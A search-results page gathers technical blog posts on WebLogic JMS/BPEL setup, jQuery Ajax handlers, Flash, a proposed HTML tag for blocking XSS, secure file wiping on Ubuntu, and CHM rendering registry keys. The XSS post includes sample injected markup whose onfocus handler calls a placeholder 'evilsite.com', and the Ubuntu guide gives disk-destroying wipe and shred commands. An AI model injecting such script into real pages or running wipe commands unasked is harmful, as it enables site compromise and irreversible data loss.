Search Results

Search found 36520 results on 1461 pages for 'default editing language'.


  • JMS Step 4 - How to Create an 11g BPEL Process Which Writes a Message Based on an XML Schema to a JMS Queue

    - by John-Brown.Evans
This post continues the series of JMS articles which demonstrate how to use JMS queues in a SOA context. The previous posts were:

    JMS Step 1 - How to Create a Simple JMS Queue in Weblogic Server 11g
    JMS Step 2 - Using the QueueSend.java Sample Program to Send a Message to a JMS Queue
    JMS Step 3 - Using the QueueReceive.java Sample Program to Read a Message from a JMS Queue

    In this example we will create a BPEL process which writes (enqueues) a message to a JMS queue using a JMS adapter. The JMS adapter will enqueue the full XML payload to the queue. This sample will use the following WebLogic Server objects:
Object Name             Type                 JNDI Name
    TestConnectionFactory   Connection Factory   jms/TestConnectionFactory
    TestJMSQueue            JMS Queue            jms/TestJMSQueue
    eis/wls/TestQueue       Connection Pool      eis/wls/TestQueue

    The first two, the Connection Factory and the JMS Queue, were created as part of the first blog post in this series, JMS Step 1 - How to Create a Simple JMS Queue in Weblogic Server 11g. If you haven't created those objects yet, please see that post for details on how to do so. The Connection Pool will be created as part of this example.

    1. Verify Connection Factory and JMS Queue

    As mentioned above, this example uses a WLS Connection Factory called TestConnectionFactory and a JMS queue called TestJMSQueue. As these are prerequisites for this example, let us verify that they exist. Log in to the WebLogic Server Administration Console and select Services > JMS Modules > TestJMSModule. You should see both objects. If not, or if TestJMSModule is missing, please see the article mentioned above and create these objects before continuing.

    2. Create a JMS Adapter Connection Pool in WebLogic Server

    The BPEL process we are about to create uses a JMS adapter to write to the JMS queue. The JMS adapter is deployed to the WebLogic server and needs to be configured to include a connection pool which references the connection factory associated with the JMS queue.

    In the WebLogic Server Console, go to Deployments, page through the list if necessary, and click the JmsAdapter. Select Configuration > Outbound Connection Pools and expand oracle.tip.adapter.jms.IJmsConnectionFactory. This displays the list of connections configured for this adapter, for example eis/aqjms/Queue, eis/aqjms/Topic etc. These JNDI names are actually quite confusing: we are configuring a connection pool here, yet the names refer to queues and topics. One would expect these to be called *ConnectionPool or *_CF or similar, but to conform to this nomenclature we will call our entry eis/wls/TestQueue. This JNDI name is also the name we will use later, when creating a BPEL process to access this JMS queue!

    Select New, check the oracle.tip.adapter.jms.IJmsConnectionFactory check box and press Next. Enter the JNDI name eis/wls/TestQueue for the connection instance, then press Finish. Expand oracle.tip.adapter.jms.IJmsConnectionFactory again and click eis/wls/TestQueue.

    The ConnectionFactoryLocation must point to the JNDI name of the connection factory associated with the JMS queue you will be writing to. In our example, this is the connection factory called TestConnectionFactory, with the JNDI name jms/TestConnectionFactory. (As a reminder, this connection factory is contained in the JMS module TestJMSModule, under Services > Messaging > JMS Modules > TestJMSModule, which we verified at the beginning of this document.) Enter jms/TestConnectionFactory into the Property Value field for Connection Factory Location. After entering it, you must press Return/Enter and then Save for the value to be accepted.

    If your WebLogic server is running in development mode, you should see the message that the changes have been activated and the deployment plan successfully updated. If not, you will need to activate the changes manually in the WebLogic server console. Although the changes have been activated, the JmsAdapter needs to be redeployed in order for the changes to become effective.
This should be confirmed by the message "Remember to update your deployment to reflect the new plan when you are finished with your changes", as can be seen in the following screen shot:

    The next step is to redeploy the JmsAdapter. Navigate back to the Deployments screen, either by selecting it in the left-hand navigation tree or by selecting the "Summary of Deployments" link in the breadcrumbs list at the top of the screen. Then select the checkbox next to JmsAdapter and press the Update button. On the Update Application Assistant page, select "Redeploy this application using the following deployment files" and press Finish. After a few seconds you should get the message that the selected deployments were updated.

    The JMS adapter configuration is complete and it can now be used to access the JMS queue. To summarize: we have created a JMS adapter connection pool with the JNDI name eis/wls/TestQueue, which points to the connection factory jms/TestConnectionFactory. eis/wls/TestQueue is the JNDI name to be used by a process such as a BPEL process, when using the JMS adapter to access the previously created JMS queue with the JNDI name jms/TestJMSQueue. In the following step, we will set up a BPEL process to use this JMS adapter to write to the JMS queue.

    3. Create a BPEL Composite with a JMS Adapter Partner Link

    This step requires that you have a valid Application Server Connection defined in JDeveloper, pointing to the application server on which you created the JMS Queue and Connection Factory. You can create this connection in JDeveloper under the Application Server Navigator. Give it any name and be sure to test the connection before completing it. This sample will use the connection name jbevans-lx-PS5, as that is the name of the connection pointing to my SOA PS5 installation.

    When using a JMS adapter from within a BPEL process, there are various configuration options, such as the operation type (consume message, produce message etc.), delivery mode and message type. One of these options is the choice of the format of the JMS message payload. It can be structured around an existing XSD, in which case the full XML element and tags are passed, or it can be opaque, meaning that the payload is sent as-is to the JMS adapter. In the case of an XSD-based message, the payload can simply be copied to the input variable of the JMS adapter. In the case of an opaque message, the JMS adapter's input variable is of type base64Binary, so the payload needs to be converted to base64 binary first. I will go into this in more detail in a later blog entry.

    This sample will pass a simple message to the adapter, based on the following simple XSD file, which consists of a single string element:

    stringPayload.xsd

    <?xml version="1.0" encoding="windows-1252" ?>
    <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                xmlns="http://www.example.org"
                targetNamespace="http://www.example.org"
                elementFormDefault="qualified">
      <xsd:element name="exampleElement" type="xsd:string">
      </xsd:element>
    </xsd:schema>

    (A sample message instance that conforms to this schema is shown at the end of this step.)

    The following steps are all executed in JDeveloper. The SOA project will be created inside a JDeveloper application. If you do not already have an application to contain the project, you can create a new one via File > New > General > Generic Application. Give the application any name, for example JMSTests, and, when prompted for a project name and type, call the project JmsAdapterWriteWithXsd and select SOA as the project technology type. If you already have an application, continue below.
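For reference, a minimal message instance that conforms to stringPayload.xsd might look like the following sketch (the Test Message text is just a placeholder value, not part of the sample project):

    <?xml version="1.0" encoding="UTF-8" ?>
    <exampleElement xmlns="http://www.example.org">Test Message</exampleElement>

    A full XML payload of this shape is what the JMS adapter will enqueue when we test the composite later.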
Create a SOA Project

    Create a new project and choose SOA Tier > SOA Project as its type. Name it JmsAdapterWriteSchema. When prompted for the composite type, choose Composite With BPEL Process. When prompted for the BPEL process, name it JmsAdapterWriteSchema too and choose Synchronous BPEL Process as the template. This will create a composite with a BPEL process and an exposed SOAP service. Double-click the BPEL process to open and begin editing it. You should see a simple BPEL process with a Receive and a Reply activity. As we created a default process without an XML schema, the input and output variables are simple strings.

    Create an XSD File

    An XSD file is required later to define the message format to be passed to the JMS adapter. In this step, we create a simple XSD file, containing a single string element, and add it to the project. First select the xsd item in the left-hand navigation tree to ensure that the XSD file is created under that item. Select File > New > General > XML and choose XML Schema. Call it stringPayload.xsd and, when the editor opens, select the Source view. Then replace the contents with the contents of the stringPayload.xsd example above and save the file. You should see it under the xsd item in the navigation tree.

    Create a JMS Adapter Partner Link

    We will create the JMS adapter as a service at the composite level. If it is not already open, double-click the composite.xml file in the navigator to open it. From the Component Palette, drag a JMS adapter onto the right-hand swim lane, under External References. This will start the JMS Adapter Configuration Wizard. Use the following entries:

    Service Name: JmsAdapterWrite
    Oracle Enterprise Messaging Service (OEMS): Oracle WebLogic JMS
    AppServer Connection: Use an existing application server connection pointing to the WebLogic server on which the above JMS queue and connection factory were created. You can use the "+" button to create a connection directly from the wizard, if you do not already have one. This example uses a connection called jbevans-lx-PS5.
    Adapter Interface > Interface: Define from operation and schema (specified later)
    Operation Type: Produce Message
    Operation Name: Produce_message
    Destination Name: Press the Browse button, select Destination Type: Queues, then press Search. Wait for the list to populate, then select the entry for TestJMSQueue, which is the queue created earlier.
    JNDI Name: The JNDI name to use for the JMS connection. This is probably the most important entry in this exercise and the most common source of error. It is the JNDI name of the JMS adapter's connection pool created in the WebLogic Server, which points to the connection factory. JDeveloper does not verify the value entered here; if you enter a wrong value, the JMS adapter won't find the queue and you will get an error message at runtime, which is very difficult to trace. In our example, this is the value eis/wls/TestQueue. (See the earlier step on how to create a JMS adapter connection pool in WebLogic Server for details.)
    Messages > URL: We will use the XSD file we created earlier, stringPayload.xsd, to define the message format for the JMS adapter. Press the magnifying glass icon to search for schema files. Expand Project Schema Files > stringPayload.xsd and select exampleElement: string.

    Press Next and Finish, which will complete the JMS adapter configuration.

    Wire the BPEL Component to the JMS Adapter

    In this step, we link the BPEL process/component to the JMS adapter.
From the composite.xml editor, drag the right-arrow icon from the BPEL process to the JMS adapter's in-arrow. This completes the steps at the composite level.

    4. Complete the BPEL Process Design

    Invoke the JMS Adapter

    Open the BPEL component by double-clicking it in the design view of the composite.xml, or open it from the project navigator by selecting the JmsAdapterWriteSchema.bpel file. This will display the BPEL process in the design view. You should see the JmsAdapterWrite partner link under one of the two swim lanes. We want it in the right-hand swim lane; if JDeveloper displays it in the left-hand lane, right-click it and choose Display > Move To Opposite Swim Lane.

    An Invoke activity is required in order to invoke the JMS adapter. Drag an Invoke activity between the Receive and Reply activities, then drag the right-hand arrow from the Invoke activity to the JMS adapter partner link. This will open the Invoke editor. The correct default values are entered automatically and are fine for our purposes; we only need to define the input variable to use for the JMS adapter. By pressing the green "+" symbol, a variable of the correct type can be auto-generated, for example with the name Invoke1_Produce_Message_InputVariable. Press OK after creating the variable. (For some reason, while I was testing this, the JMS adapter moved back to the left-hand swim lane again after this step. There is no harm in leaving it there, but I find it easier to follow if it is in the right-hand lane, because I kind of think of the message coming in on the left and being routed through the right. But you can follow your personal preference here.)

    Assign Variables

    Drag an Assign activity between the Receive and Invoke activities. We will simply copy the input variable to the JMS adapter's input variable and, so that the process has an output to print, copy it to the process's output variable as well. Double-click the Assign activity and create two Copy rules:

    for the first, drag Variables > inputVariable > payload > client:process > client:input_string to Invoke1_Produce_Message_InputVariable > body > ns2:exampleElement
    for the second, drag the same input variable to outputVariable > payload > client:processResponse > client:result

    This will create two copy rules, similar to the following. Press OK. This completes the BPEL and composite design.

    5. Compile and Deploy the Composite

    We won't go into too much detail on how to compile and deploy. In JDeveloper, compile the process by pressing the Make or Rebuild icons or by right-clicking the project name in the navigator and selecting Make... or Rebuild... If the compilation is successful, deploy it to the SOA server connection defined earlier: right-click the project name in the navigator, select Deploy to Application Server, choose the application server connection, choose the partition on the server (usually default) and press Finish. You should see the message ---- Deployment finished. ---- in the Deployment frame if the deployment was successful.

    6. Test the Composite

    This is the exciting part. Open two tabs in your browser and log in to the WebLogic Administration Console in one tab and the Enterprise Manager 11g Fusion Middleware Control (EM) for your SOA installation in the other. We will use the Console to monitor the messages being written to the queue and the EM to execute the composite. In the Console, go to Services > Messaging > JMS Modules > TestJMSModule > TestJMSQueue > Monitoring and note the number of messages under Messages Current.
In the EM, go to SOA > soa-infra (soa_server1) > default (or wherever you deployed your composite to) and click on JmsAdapterWriteSchema [1.0], then press the Test button. Under Input Arguments, enter any string into the text input field for the payload, for example Test Message, then press Test Web Service. If the instance is successful, you should see the same text in the Response message, "Test Message".

    In the Console, refresh the Monitoring screen to confirm a new message has been written to the queue. Check the checkbox and press Show Messages. Click on the newest message and view its contents. They should include the full XML of the entered payload.

    7. Troubleshooting

    If you get an exception similar to the following at runtime:

    BINDING.JCA-12510
    JCA Resource Adapter location error.
    Unable to locate the JCA Resource Adapter via .jca binding file element
    The JCA Binding Component is unable to startup the Resource Adapter specified in the element: location='eis/wls/QueueTest'.
    The reason for this is most likely that either
    1) the Resource Adapters RAR file has not been deployed successfully to the WebLogic Application server or
    2) the '<jndi-name>' element in weblogic-ra.xml has not been set to eis/wls/QueueTest. In the last case you will have to add a new WebLogic JCA connection factory (deploy a RAR).
    Please correct this and then restart the Application Server
    at oracle.integration.platform.blocks.adapter.fw.AdapterBindingException.createJndiLookupException(AdapterBindingException.java:130)
    at oracle.integration.platform.blocks.adapter.fw.jca.cci.JCAConnectionManager$JCAConnectionPool.createJCAConnectionFactory(JCAConnectionManager.java:1387)
    at oracle.integration.platform.blocks.adapter.fw.jca.cci.JCAConnectionManager$JCAConnectionPool.newPoolObject(JCAConnectionManager.java:1285)
    ...

    then this is very likely due to an incorrect JNDI name entered for the JMS connection in the JMS Adapter Wizard. Recheck those steps. The error message prints the JNDI name used; in this example, it was incorrectly entered as eis/wls/QueueTest instead of eis/wls/TestQueue.

    This concludes this example.

    Best regards
    John-Brown Evans
    Oracle Technology Proactive Support Delivery

    Read the article

  • Simplify your Ajax code by using jQuery Global Ajax Handlers and ajaxSetup low-level interface

    - by hajan
Creating web applications with a consistent layout and user interface is very important for your users. In several ASP.NET projects I've completed lately, I've been using jQuery and jQuery Ajax a lot to achieve a rich user experience and seamless interaction between the client and the server. In almost all of them, I took advantage of the nice jQuery global Ajax handlers and jQuery Ajax functions.

    Let's say you build a web application which mainly interacts with the server using Ajax POSTs and GETs to accomplish various operations. As you may already know, you can easily perform Ajax operations using the jQuery Ajax low-level method or jQuery $.get, $.post, etc. A simple get example:

    $.get("/Home/GetData", function (d) { alert(d); });

    As you can see, this is the simplest possible way to make an Ajax call. What it does behind the scenes is construct a low-level Ajax call by specifying all the necessary information for the request, filling the required properties such as data type, content type, etc. with default values.

    If you want more control over what is happening with your Ajax requests, you can easily take advantage of the global Ajax handlers. In order to register global Ajax handlers, the jQuery API provides a set of global Ajax methods. You can find all the methods in the following link http://api.jquery.com/category/ajax/global-ajax-event-handlers/, and these are:

    ajaxComplete
    ajaxError
    ajaxSend
    ajaxStart
    ajaxStop
    ajaxSuccess

    And the low-level Ajax interfaces, http://api.jquery.com/category/ajax/low-level-interface/:

    ajax
    ajaxPrefilter
    ajaxSetup

    For global settings, I usually use ajaxSetup, combining it with the Ajax event handlers. $.ajaxSetup is very good for setting default values that you will use in all of your future Ajax requests, so that you won't need to repeat the same properties all the time unless you want to override the defaults. Mainly, I use the global ajaxSetup function similarly to the following:

    $.ajaxSetup({
        cache: false,
        error: function (x, e) {
            if (x.status == 550)
                alert("550 Error Message");
            else if (x.status == "403")
                alert("403. Not Authorized");
            else if (x.status == "500")
                alert("500. Internal Server Error");
            else
                alert("Error...");
        },
        success: function (x) {
            //do something global on success...
        }
    });

    Now you can make Ajax calls using the low-level $.ajax interface without worrying about specifying any of the properties we've set in the $.ajaxSetup function (see the sketch below), and you can create your own ways to handle various situations when your Ajax requests are occurring. Sometimes some of your Ajax requests may take much longer than expected, so in order to provide a user-friendly UI that shows a progress bar or an animated image while something is happening in the background, you can combine the ajaxStart and ajaxStop methods to do the same.
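Before wiring that up, here is a minimal sketch of a call that simply relies on the defaults registered above (the /Home/GetData URL is the same example endpoint used earlier in this post):

    $.ajax({
        url: "/Home/GetData",
        type: "GET",
        success: function (d) {
            // this per-call success overrides the global one from $.ajaxSetup;
            // cache:false and the global error handler still apply automatically
            alert(d);
        }
    });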
First of all, add the following <div> anywhere on your master layout / master page (you can download nice Ajax loading images from http://ajaxload.info/):

    <div id="loading" style="display:none;">
        <img src="@Url.Content("~/Content/images/ajax-loader.gif")" alt="Ajax Loader" />
    </div>

    Then, add the following two handlers:

    $(document).ajaxStart(function () {
        $("#loading").attr("style", "position:absolute; z-index: 1000; top: 0px; "+
            "left:0px; text-align: center; display:none; background-color: #ddd; "+
            "height: 100%; width: 100%; /* These three lines are for transparency "+
            "in all browsers. */-ms-filter:\"progid:DXImageTransform.Microsoft.Alpha(Opacity=50)\";"+
            " filter: alpha(opacity=50); opacity:.5;");
        $("#loading img").attr("style", "position:relative; top:40%; z-index:5;");
        $("#loading").show();
    });
    $(document).ajaxStop(function () {
        $("#loading").removeAttr("style");
        $("#loading img").removeAttr("style");
        $("#loading").hide();
    });

    Note: While you could reorganize the style in a more reusable way, since these are global Ajax start/stop handlers, it is quite possible that you won't use the same style anywhere else.

    With this in place, you will see that for any Ajax request in your web site or application, the loading image appears, providing a better user experience.

    What I've shown are several useful examples of how to simplify your Ajax code by using the global Ajax handlers and the low-level ajaxSetup function. Of course, you can do a lot more with the other methods as well. Hope this was helpful.

    Regards, Hajan

    Read the article

  • What's the ultimate way to install debug Flash Player in Firefox?

    - by Bart van Heukelom
What's the easiest way to get a debug Flash Player (the one you can download from here, though I don't care if it's downloaded automatically) working in Firefox?

    64-bit system, default Firefox from the repository.
    If possible, I don't want the Flash player to be replaced automatically by a newer but non-debug version (updating to a new debug version is OK).
    I want the most recent version (10.2 at the moment).

    Read the article

  • Wishful Thinking: Why can't HTML fix Script Attacks at the Source?

    - by Rick Strahl
The Web can be an evil place, especially if you're a Web developer blissfully unaware of Cross Site Script Attacks (XSS). Even if you are aware of XSS in all of its insidious forms, it's extremely complex to deal with all the issues if you're taking user input and you're actually allowing users to post raw HTML into an application. I'm dealing with this again today in a Web application where legacy data contains raw HTML that has to be displayed and users ask for the ability to use raw HTML as input for listings.

    The first line of defense of course is: just say no to HTML input from users. If you don't allow HTML input directly and use HTML encoding (HttpUtility.HtmlEncode() in .NET, or standard ASP.NET MVC output via @Model.Content) you're fairly safe, at least from the HTML input provided. Both WebForms and Razor support HtmlEncoded content, although Razor makes it the default. In Razor, the default @ expression syntax @Model.UserContent automatically produces HTML-encoded content - you actually have to go out of your way to create raw HTML content (safe by default) using @Html.Raw() or the HtmlString class. In Web Forms (v4) you can use <%: Model.UserContent %>, or, if you're using a version prior to 4.0, <%= HttpUtility.HtmlEncode(Model.UserContent) %>.

    This works great as a hedge against embedded <script> tags and HTML markup, as any HTML is turned into text that displays the markup but doesn't render it. But it turns any embedded HTML markup tags into plain text, so if you need to display HTML in raw form with the markup tags rendering based on user input, this approach is worthless.

    If you do accept HTML input and need to echo the rendered HTML input back, the task of cleaning up that HTML is a complex one. In the projects I work on, customers are frequently asking for the ability to post raw HTML. Almost every app I've built where there's document content from users starts out with text-only input - possibly using something like Markdown - but inevitably users want to just post plain old HTML they created in some other rich editing application. I see this a lot with realtors especially, who often want to reuse their postings easily in multiple places. In my work this is a common problem I need to deal with, and I've tried dozens of different methods, from sanitizing and simple rejection of input to custom markup schemes, none of which have ever felt comfortable to me. They work in a half-assed, hacked-together sort of way, but I always live in fear of missing something vital, which is *really easy to do*.

    My Wishlist Item: A <restricted> tag in HTML

    Let me dream here for a second on how to address this problem. It seems to me the easiest place where this can be fixed is: in the browser. Browsers are actually executing script code, so they have a lot of control over the script code that resides in a page. What if there was a way to specify that you want to turn off script code for a block of HTML? The main issue when dealing with raw HTML input isn't that we as developers are unaware of the implications of user input, but the fact that we sometimes have to display raw HTML input the user provides. So the problem markup is usually isolated in only a very specific part of the document.

    So, what if we had a way to specify that in any given HTML block no script code could execute, by wrapping it into a tag that disables all script functionality in the browser? This would include <script> tags and any document script attributes like onclick, onfocus etc.,
and potentially also disallow things like iFrames that can potentially be scripted from within the iFrame's target. I'd like to see something along these lines:

    <article>
        <restricted allowscripts="no" allowiframes="no">
            <div>Some content</div>
            <script>alert('go ahead, make my day, punk!');</script>
            <div onfocus="$.getJSON('http://evilsite.com/')">more content</div>
        </restricted>
    </article>

    A tag like this would basically disallow all script code from firing from any HTML that's rendered within it. You'd use this only on code that you actually render from your data, and only if you are dealing with custom data. So something like this:

    <article>
        <restricted>
            @Html.Raw(Model.UserContent)
        </restricted>
    </article>

    For browsers this would actually be easy to intercept. They render the DOM and control loading and execution of scripts that are loaded through it. All the browser would have to do is suspend execution of <script> tags and not hook up any event handlers defined via markup in this block. Given all the crazy XSS attacks that exist and the prevalence of this problem, this would go a long way towards preventing at least coded script attacks in the DOM. And it seems like a totally doable solution that wouldn't be very difficult for vendors to implement. There would also need to be some logic in the parser to not allow a </restricted> or <restricted> tag inside the content, so the restricted section can't be short-circuited (per James Hart's comment). I'm sure there are other issues to consider as well that I didn't think of in my off-the-back-of-a-napkin concept here, but the idea overall seems worth consideration I think.

    Without code running in a user-supplied HTML block it'd be pretty hard to compromise a local HTML document and pass information like cookies to a server - or even send data to a server, period. Short of an iFrame that can access the parent frame (which is another restriction that should be available on this <restricted> tag) and could potentially communicate back, there's not a lot a malicious site could do. The HTML could still 'phone home' via image links and href links, potentially, and basically say this site was accessed, but without the ability to run script code it would be pretty tough to pass along critical information to the server beyond that.

    Ahhhh… one can dream… Not holding my breath, of course. The design-by-committee that is the W3C can't agree on anything in timeframes measured in less than decades, but maybe this is one place where browser vendors can actually step up the pressure. This is something in their best interest: reducing the attack surface for vulnerabilities on their browser platforms significantly. Several people commented on Twitter today that there isn't enough discussion on issues like this that address serious needs in the web browser space. Realistically, security has to be the number one concern with Web applications in general - there isn't a Web app out there that is not vulnerable. And yet nothing has been done to address these security issues, even though there might be relatively easy solutions to make this happen.
It'll take time, and it's probably not going to happen in our lifetime, but maybe this rambling thought sparks some ideas on how this sort of restriction can get into browsers in some way in the future.

    © Rick Strahl, West Wind Technologies, 2005-2012
    Posted in ASP.NET  HTML5  HTML  Security

    Read the article

  • Use an Ubuntu Live CD to Securely Wipe Your PC’s Hard Drive

    - by Trevor Bekolay
Deleting files or quickly formatting a drive isn't enough for sensitive personal information. We'll show you how to get rid of it for good using an Ubuntu Live CD.

    When you delete a file in Windows, Ubuntu, or any other operating system, it doesn't actually destroy the data stored on your hard drive; it just marks that data as "deleted." If you overwrite it later, then that data is generally unrecoverable, but if the operating system doesn't happen to overwrite it, then your data is still stored on your hard drive, recoverable by anyone who has the right software. By securely deleting files or entire hard drives, your data will be gone for good.

    Note: Modern hard drives are extremely sophisticated, as are the experts who recover data for a living. There is no guarantee that the methods covered in this article will make your data completely unrecoverable; however, they will make your data unrecoverable to the majority of recovery methods, and to all methods that are readily available to the general public.

    Shred individual files

    Most of the data stored on your hard drive is harmless and doesn't reveal anything about you. If there are just a few files that you know you don't want someone else to see, then the easiest way to get rid of them is a built-in Linux utility called shred.

    Open a terminal window by clicking on Applications at the top-left of the screen, then expanding the Accessories menu and clicking on Terminal. Navigate to the file that you want to delete using cd to change directories and ls to list the files and folders in the current directory.

    As an example, we've got a file called BankInfo.txt on a Windows NTFS-formatted hard drive. We want to delete it securely, so we'll call shred by entering the following in the terminal window:

    shred <file>

    which is, in our example:

    shred BankInfo.txt

    Notice that our BankInfo.txt file still exists, even though we've shredded it. A quick look at the contents of BankInfo.txt makes it obvious that the file has indeed been securely overwritten. We can use some command-line arguments to make shred delete the file from the hard drive as well. We can also be extra careful about the shredding process by upping the number of times shred overwrites the original file. To do this, in the terminal, type in:

    shred --remove --iterations=<num> <file>

    By default, shred overwrites the file 25 times. We'll double this, giving us the following command:

    shred --remove --iterations=50 BankInfo.txt

    BankInfo.txt has now been securely wiped on the physical disk, and also no longer shows up in the directory listing. Repeat this process for any sensitive files on your hard drive!

    Wipe entire hard drives

    If you're disposing of an old hard drive, or giving it to someone else, then you might instead want to wipe your entire hard drive. shred can be invoked on hard drives, but on modern file systems the shred process may be reversible. We'll use the program wipe to securely delete all of the data on a hard drive.

    Unlike shred, wipe is not included in Ubuntu by default, so we have to install it. Open up the Synaptic Package Manager by clicking on System in the top-left corner of the screen, then expanding the Administration folder and clicking on Synaptic Package Manager. wipe is part of the Universe repository, which is not enabled by default. We'll enable it by clicking on Settings > Repositories in the Synaptic Package Manager window. Check the checkbox next to "Community-maintained Open Source software (universe)". Click Close.
You'll need to reload Synaptic's package list. Click on the Reload button in the main Synaptic Package Manager window. Once the package list has been reloaded, the text over the search field will change to "Rebuilding search index". Wait until it reads "Quick search," and then type "wipe" into the search field. The wipe package should come up, along with some other packages that perform similar functions. Click on the checkbox to the left of the label "wipe" and select "Mark for Installation". Click on the Apply button to start the installation process, then click the Apply button on the Summary window that pops up. Once the installation is done, click the Close button and close the Synaptic Package Manager window.

    Open a terminal window by clicking on Applications in the top-left of the screen, then Accessories > Terminal. You need to figure out the correct hard drive to wipe. If you wipe the wrong hard drive, that data will not be recoverable, so exercise caution! In the terminal window, type in:

    sudo fdisk -l

    A list of your hard drives will show up. A few factors will help you identify the right hard drive. One is the file system, found in the System column of the list - Windows hard drives are usually formatted as NTFS (which shows up as HPFS/NTFS). Another good identifier is the size of the hard drive, which appears after its identifier (highlighted in the following screenshot). In our case, the hard drive we want to wipe is only around 1 GB large and is formatted as NTFS. We make a note of the label found under the Device column heading. If you have multiple partitions on this hard drive, then there will be more than one device in this list. The wipe developers recommend wiping each partition separately.

    To start the wiping process, type the following into the terminal:

    sudo wipe <device label>

    In our case, this is:

    sudo wipe /dev/sda1

    Again, exercise caution - this is the point of no return! Your hard drive will be completely wiped. It may take some time to complete, depending on the size of the drive you're wiping.

    Conclusion

    If you have sensitive information on your hard drive - and chances are you probably do - then it's a good idea to securely delete sensitive files before you give away or dispose of your hard drive. The most secure way to delete your data is with a few swings of a hammer, but shred and wipe from an Ubuntu Live CD is a good alternative!
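As a footnote to the shred section above, here's a small sketch of how shred can be combined with find to clean out a whole directory of sensitive files in one pass - the ~/sensitive-docs path is hypothetical:

    # Hypothetical example: overwrite every file under ~/sensitive-docs
    # 50 times, then unlink each one (same shred flags as used above).
    find ~/sensitive-docs -type f -exec shred --remove --iterations=50 {} \;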

    Read the article

  • Make your CHM Help Files show HTML5 and CSS3 content

    - by Rick Strahl
The HTML Help 1.0 specification, aka CHM files, is pretty old. In fact, it's practically ancient, as it arrived in 1997 alongside Internet Explorer 4. HTML Help 1.0 is basically a completely HTML-based help system that uses a help viewer which internally uses Internet Explorer to render the HTML Help content. Because of its use of the Internet Explorer shell for rendering, there were many security issues in the past, which resulted in a locking down of the Web Browser control in Windows and also of the help engine, which caused some unfortunate side effects.

    Even so, CHM continues to be a popular help format because it is very easy to produce content for it, using plain HTML, and because it works with many Windows application platforms out of the box. While there have been various attempts to replace CHM, it still seems to be a popular choice for many applications to display their help systems. The biggest alternative these days is no system-based help at all, but links to online documentation. For Windows apps, though, it's still very common to see CHM help files, and there are still a ton of CHM help files out there and lots of tools (including our own West Wind Html Help Builder) that produce output for CHM files as well as Web output.

    Image is Everything and you ain't got it!

    One problem with the CHM engine is that it's stuck with an ancient Internet Explorer version for rendering. For example, if you have help content that uses HTML5 or CSS3, you might have an HTML Help topic like the following, shown here in a full Web Browser instance of Internet Explorer:

    The page clearly uses some CSS3 features like rounded corners and box shadows that are rendered using plain CSS3 features. Note that I used Internet Explorer on purpose here to demonstrate that IE9 on Windows 7 can properly render this content using some of the new features of CSS, but the same is true for all other recent versions of the major browsers (FireFox 3.1+, Safari 4.5+, WebKit 9+ etc.). Unfortunately, if you take this nice and simple CSS3 content and run it through the HTML Help compiler to produce a CHM file, the resulting output on the same machine looks a bit less flashy:

    All the CSS3 styling is gone. The page still displays and functions, but all the extra styling features are lost - even though I am running this on a Windows 7 machine with IE9 that should be able to render these CSS features. Bummer.

    Web Browser Control - perpetually stuck in IE 7 Mode

    The problem is the Web Browser/Shell components in Windows. This component is and has been part of Windows for as long as Internet Explorer has been around, but the Web Browser control hasn't kept up with the latest versions of IE. In a nutshell, the control is stuck in IE7 rendering mode by default, for engine compatibility reasons. However, there is at least one way to fix this explicitly, using registry keys on a per-application basis. The key point from that blog article is that you can override the IE rendering engine for a particular executable by setting one (or more) registry flags that tell the Windows Shell which version of the Internet Explorer rendering engine to load. An application that wishes to use a more recent version of Internet Explorer can then register itself during installation for the specific IE version desired, and from then on the application will use that version of the Web Browser component.
If the application is older than the specified version, it falls back to the default version (IE7 rendering).

    Forcing CHM files to display with IE9 (or later) Rendering

    Knowing that we can force the IE version used for a given process, it's also possible to affect the CHM rendering by setting the same keys on the executable that's hosting the CHM file. What that executable is depends on the type of application, as there are a number of ways to launch the help engine:

    hh.exe - The standalone Windows CHM help viewer that launches when you open a CHM from Windows Explorer. You can manually add hh.exe to the registry keys.
    YourApplication.exe - If you're using .NET or any tool that internally uses the hhControl ActiveX control to launch help content, your application is the host. You should add your application's exe to the registry during application startup.
    foxhhelp9.exe - If you're building a FoxPro application that uses the built-in help features, foxhhelp9.exe is used to actually host the help controls. Make sure to add this executable to the registry.

    What to set

    You can configure the Internet Explorer version used for an application in the registry by specifying the executable file name and a value that specifies the IE version desired. There are two different sets of keys, for 32 bit and 64 bit applications.

    32 bit only or 64 bit:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION
    Value Key: hh.exe

    32 bit on a 64 bit machine:
    HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION
    Value Key: hh.exe

    Note that it's best to always set both values, ideally when you install your application, so that it works regardless of which platform you run on. The value specified is a DWORD, and the interesting values are decimal 9000 for IE9 rendering mode that respects !DOCTYPE settings, or 9999 for IE9 standards mode always. You can use the same logic with 8000 and 8888 for IE8, and the final value of 7000 for IE7 (one has to wonder what they're going to do for version 10 to perpetuate that pattern). I think 9000 is the value you'd most likely want to use: it means IE9 will be used for rendering, but unless the right doctypes are used (XHTML and HTML5 specifically) IE will still fall back into quirks mode as needed. This should allow existing pages to continue to use the fallback engine, while new pages that have the proper HTML doctype set can take advantage of the newest features. (A ready-to-import .reg sketch of these settings appears at the end of this post.)

    Here's an example of how I set the registry keys in my Tarma Installmate registry configuration:

    Note that I set all three values both under the Software and Wow6432Node keys so that this works regardless of where these EXEs are launched from. Even though all the apps are 32 bit, the 64 bit key (the default one shown selected) is often used. So, once I've set the registry key for hh.exe, I can launch my CHM help file from Explorer and see the following CSS3 IE9-rendered display:

    Summary

    It sucks that we have to go through all these hoops to get what should be natural behavior for an application: supporting the latest features available on a system. But it shouldn't be a surprise - the Windows Help team (if there even is such a thing) has not been known for forward-looking technologies. It's a pretty big hassle that we have to resort to setting registry keys in order to get the Web Browser control and the internal CHM engine to render properly, but at least it's possible to make it work after all.
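For convenience, here is a minimal .reg sketch of the hh.exe entries described above (0x2328 is 9000 decimal; this covers only the standalone viewer - your own EXEs would get analogous entries):

    Windows Registry Editor Version 5.00

    ; IE9 doctype-respecting rendering (9000 decimal) for the standalone CHM viewer
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION]
    "hh.exe"=dword:00002328

    ; Same value under Wow6432Node for 32 bit processes on 64 bit Windows
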